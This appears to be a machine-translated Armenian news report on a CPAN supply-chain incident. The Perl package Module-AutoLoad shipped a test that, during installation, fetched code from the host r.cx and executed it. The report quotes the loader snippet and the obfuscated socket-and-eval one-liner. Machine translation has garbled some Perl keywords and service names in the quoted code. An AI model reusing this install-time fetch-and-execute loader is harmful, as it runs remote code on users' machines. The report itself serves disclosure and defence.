Module-AutoLoad Perl փաթեթում հայտնաբերվել է վնասակար կոդ
CPAN գրացուցակի միջոցով բաշխված Perl փաթեթում Module-AutoLoad, որը նախատեսված է CPAN մոդուլներն ավտոմատ կերպով բեռնելու համար, բացահայտված վնասակար կոդ. Վնասակար ներդիրն էր հայտնաբերվել է թեստի կոդում 05_rcx.t, որը առաքվում է 2011 թվականից։
Հատկանշական է, որ հարցեր են ծագել կասկածելի կոդը բեռնելու վերաբերյալ Stackoverflow դեռ 2016թ.
Վնասակար գործողությունները հանգում են փորձին՝ ներբեռնելու և գործարկելու կոդը երրորդ կողմի սերվերից (http://r.cx:1/) մոդուլի տեղադրման ժամանակ գործարկված թեստային փաթեթի կատարման ընթացքում: Ենթադրվում է, որ արտաքին սերվերից ի սկզբանե ներբեռնված կոդը վնասակար չի եղել, սակայն այժմ հարցումը վերահղված է ww.limera1n.com տիրույթին, որն ապահովում է կոդի իր մասը կատարման համար։
Ներբեռնումը ֆայլում կազմակերպելու համար 05_rcx.t Օգտագործվում է հետևյալ կոդը.
իմ $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
Նշված կոդը հանգեցնում է սցենարի կատարմանը ../contrib/RCX.pl, որի բովանդակությունը կրճատվում է տողով.
օգտագործել lib do{eval&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};
Այս սցենարը բեռնվում է շփոթված օգտվելով ծառայությունից perlobfuscator.com կոդը արտաքին հոսթից r.cx (նիշերի կոդերը 82.46.99.88 համապատասխանում են «R.cX» տեքստին) և այն կատարում է eval բլոկում:
Խնդրահարույց փաթեթն այժմ հեռացվել է պահոցից: Դադարեցնել (Perl Authors Upload Server), և մոդուլի հեղինակի հաշիվն արգելափակված է: Այս դեպքում մոդուլը դեռ մնում է հասանելի է MetaCPAN-ի արխիվում և կարող է ուղղակիորեն տեղադրվել MetaCPAN-ից՝ օգտագործելով որոշ կոմունալ ծառայություններ, ինչպիսիք են cpanminus-ը: Նշվում էոր փաթեթը լայն տարածում չի գտել։
Հետաքրքիր է քննարկել միացված և մոդուլի հեղինակը, ով հերքել է այն տեղեկությունը, որ իր «r.cx» կայքի կոտրումից հետո վնասակար կոդ է տեղադրվել և բացատրել, որ ինքը պարզապես զվարճանում է, և օգտագործել է perlobfuscator.com-ը ոչ թե ինչ-որ բան թաքցնելու, այլ չափը փոքրացնելու համար։ կոդը և պարզեցնելով դրա պատճենումը clipboard-ի միջոցով: «botstrap» ֆունկցիայի անվան ընտրությունը բացատրվում է նրանով, որ այս բառը «հնչում է որպես bot և ավելի կարճ է, քան bootstrap»: Մոդուլի հեղինակը նաև վստահեցրել է, որ հայտնաբերված մանիպուլյացիաները չեն կատարում վնասակար գործողություններ, այլ միայն ցուցադրում են կոդի բեռնումը և կատարումը TCP-ի միջոցով։